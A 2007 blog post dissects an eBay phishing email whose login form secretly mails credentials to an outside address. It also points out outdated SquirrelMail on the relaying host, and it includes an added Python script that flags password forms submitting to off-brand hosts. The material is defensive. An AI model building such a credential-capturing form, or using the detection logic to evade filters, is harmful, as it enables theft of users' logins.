Thursday, 24 May 2007

Another mailto eBay phish

Here's a genuine-looking eBay phishing attempt that came in today. As you can see, all the links point back to the genuine eBay site:

It's only when you view the source code that you notice that something doesn't seem right with this email. You can see that if you did try to log in to eBay directly from this email, your eBay login details would be kindly sent to seflab...@yahoo.com via the mailto server mailhost.dglnet.com.br:
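
The mismatch described above, links on the genuine site but a login form that submits somewhere else, can be checked mechanically. This is an added example, not code from the original post; the sample HTML, the host mailhost.example.net, the recipient address and the function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample (hosts and addresses are placeholders, not from the post):
# every visible link is on the brand's site, but the login form submits to a
# form-to-mail script on an unrelated host with a hidden recipient address.
SAMPLE_HTML = """
<a href="https://www.ebay.com/">eBay Home</a>
<a href="https://signin.ebay.com/help">Forgot your password?</a>
<form method="post" action="http://mailhost.example.net/cgi-bin/formmail">
  <input type="hidden" name="recipient" value="collector@example.com">
  <input type="text" name="userid">
  <input type="password" name="pass">
</form>
"""

class FormAudit(HTMLParser):
    """Collect link hosts and, per form, its action and notable inputs."""
    def __init__(self):
        super().__init__()
        self.link_hosts, self.forms, self.in_form = set(), [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "a" and a.get("href"):
            self.link_hosts.add(urlparse(a["href"]).hostname or "")
        elif tag == "form":
            self.in_form = True
            self.forms.append({"action": a.get("action", ""), "password": False, "mail_fields": []})
        elif tag == "input" and self.in_form:
            kind, form = a.get("type", "").lower(), self.forms[-1]
            form["password"] |= kind == "password"
            if kind == "hidden" and "@" in a.get("value", ""):
                form["mail_fields"].append(a["value"])

    def handle_endtag(self, tag):
        if tag == "form":
            self.in_form = False

def on_brand(host, brand):
    return host == brand or host.endswith("." + brand)

def audit(html, brand):
    """Return forms that collect a password but submit off the brand's site."""
    p = FormAudit()
    p.feed(html)
    links_ok = bool(p.link_hosts) and all(on_brand(h, brand) for h in p.link_hosts)
    return [dict(f, links_all_on_brand=links_ok) for f in p.forms
            if f["password"] and not on_brand(urlparse(f["action"]).hostname or "", brand)]
```

A finding with `links_all_on_brand` set to true is the pattern in this email: nothing visible looks wrong, and only the form target gives it away.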

So, let's take a look at mailhost.dglnet.com.br. Well, looks like they are running SquirrelMail, but let's check out the version number... hmmm... v1.4.4:

Let's go to the main SquirrelMail site and see what the current version is. Well, the latest one is:

SquirrelMail 1.4.10a Released
May 09, 2007 by Thijs Kinkhorst

The SquirrelMail Project Team is proud to announce the release of SquirrelMail 1.4.10a.

The 1.4.10 release contains multiple fixes for cross site scripting issues triggered by viewing HTML mail. Besides that it contains bug fixes and stability enhancements.

The version before that looks something like this, changelog-wise:

Are there any problems with running older versions... yep... just a few!

So, looks like keeping webmail software up to date is a must.
